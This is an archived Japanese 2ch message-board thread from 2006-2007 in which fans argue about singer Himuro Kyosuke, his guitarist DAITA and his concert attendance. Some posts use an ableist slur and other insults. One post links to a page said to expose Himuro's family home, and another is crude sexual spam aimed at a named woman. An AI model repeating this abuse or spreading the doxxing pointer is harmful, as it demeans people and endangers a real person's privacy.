まあそれは光栄なことなこかもな。
俺のレスを見て何かを感じてるお前・・・・その気持ちはありがたく貰っておく。

142 :NO MUSIC NO NAME:2006/12/09(土) 23:44:25 ID:bYGBRzMZ
氷室に「こういう感じで弾いてくれ」と要求されたことに対し的確に答えることができるDAITA
氷室にとって良いギターリストは忠実さ。
その忠実さというのはギターのテクニックセンスはもちろん、
相手が何を要求してるかということを読むことができるセンスも重要だと思う。
つまりDAITAはセンスのあるギターリストということだろう。

センスのある奴=利口
センスの無い奴=馬鹿・蛆虫・キチガイ


143 :NO MUSIC NO NAME:2006/12/09(土) 23:47:41 ID:gCUWPJsz
>>142
俺のレスを片っ端からコピペかw
お前が俺に対し嫉妬してるからそうしてるんだろうが・・・
まあそれは光栄なことなこかもな。
俺のレスを見て何かを感じてるお前・・・・その気持ちはありがたく貰っておく。

144 :NO MUSIC NO NAME:2006/12/09(土) 23:49:28 ID:8cj1fcdA
ギターリストww

145 :NO MUSIC NO NAME:2006/12/12(火) 07:29:51 ID:EgnGNFVT
糞アーティスト晒しhage

146 :age:2006/12/12(火) 07:57:37 ID:L9fngsW+
age

147 :NO MUSIC NO NAME:2006/12/12(火) 13:46:34 ID:BAVLM0dF
ラブ イズ ビューティフル(笑)

148 :NO MUSIC NO NAME:2006/12/12(火) 14:05:50 ID:H2QeBzVR
↑こいつ色んなスレで何がしたいの?

149 :NO MUSIC NO NAME:2006/12/12(火) 23:52:16 ID:sppo2V0F
Love Is Strong

150 :NO MUSIC NO NAME:2006/12/14(木) 23:29:51 ID:1quW0Hw6
あぁ、今でもBOOWYに拘ってる人らしい意見だね。
ハイウェイだけが当時に一番近いから。
今の氷室の音楽が好きな人は、ジュリエットもクラウディーハートも「いい!」って言うけどね。


151 :NO MUSIC NO NAME:2006/12/15(金) 18:41:42 ID:NN3+1dYP
糞アーティスト晒しhage




152 :NO MUSIC NO NAME:2006/12/18(月) 17:20:08 ID:9etPcL5P
ラブ イズ ビューティフル(笑)




153 :NO MUSIC NO NAME:2006/12/20(水) 01:28:50 ID:7T0TjK99
氷室の実家を晒してるDQN婆がいるぞ!!
推定35〜40歳だと思うが・・・

http://pr2.cgiboy.com/S/2491129

154 :NO MUSIC NO NAME:2006/12/21(木) 08:35:02 ID:jKczKGff
糞アルバム晒しage

155 :NO MUSIC NO NAME:2006/12/28(木) 07:40:04 ID:snZ6UtwE
良スレage

156 :誘導:2006/12/29(金) 15:22:22 ID:mMwMZK+P
氷室京介〜IN THE MOOD〜Part344
http://music5.2ch.net/test/read.cgi/musicjm/1167149882/l50

157 :NO MUSIC NO NAME:2006/12/31(日) 15:30:59 ID:je/gqv/D
neoまではボーイヲタの残党が多数追っかけてたから。
空席が出るようになったのは転売屋のせい。
チケを大量に抱え込む人間は、あのサッカーワールドカップでさえ
空席を作り出した。
怠慢どころか氷室はこの数十年コンスタントに活動してるし
おまいが知らないだけ。
糞活動させられてるって思ってるのはイタイ。活動内容を選んでるのは
氷室自身だし。
飯食うために活動?笑わせるね。
氷室はいつ、業界止めたっていいくらいの財力持ってるけど
アーティストにそんなん関係ないから自分のやりたいこと続けてるだけ。












158 :batti ◆kRInW1FLSg :2006/12/31(日) 22:08:59 ID:f2NduAA2
みんなありがとう、俺様最高!!
来年もよろしくだぜ!!

159 :NO MUSIC NO NAME:2007/01/05(金) 16:57:43 ID:CaG2KAoQ
neoまではボーイヲタの残党が多数追っかけてたから。
空席が出るようになったのは転売屋のせい。
チケを大量に抱え込む人間は、あのサッカーワールドカップでさえ
空席を作り出した。
怠慢どころか氷室はこの数十年コンスタントに活動してるし
おまいが知らないだけ。
糞活動させられてるって思ってるのはイタイ。活動内容を選んでるのは
氷室自身だし。
飯食うために活動?笑わせるね。
氷室はいつ、業界止めたっていいくらいの財力持ってるけど
アーティストにそんなん関係ないから自分のやりたいこと続けてるだけ。














160 :NO MUSIC NO NAME:2007/01/08(月) 06:05:20 ID:CAH4sVFy
さいきん近所にすんでいるゆうか姉さんにハマリました
このごろゆうか姉さんのことを考えて妄想ばかりしている21の学生です
勉強もバイトもうわの空です
こんな僕でよければ僕だけの「中だし専用マンコ」になってください
おねがいします
もし中だしさせてくれるなら一ヶ月ぐらいオナニーがまんしますって感じです









33 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)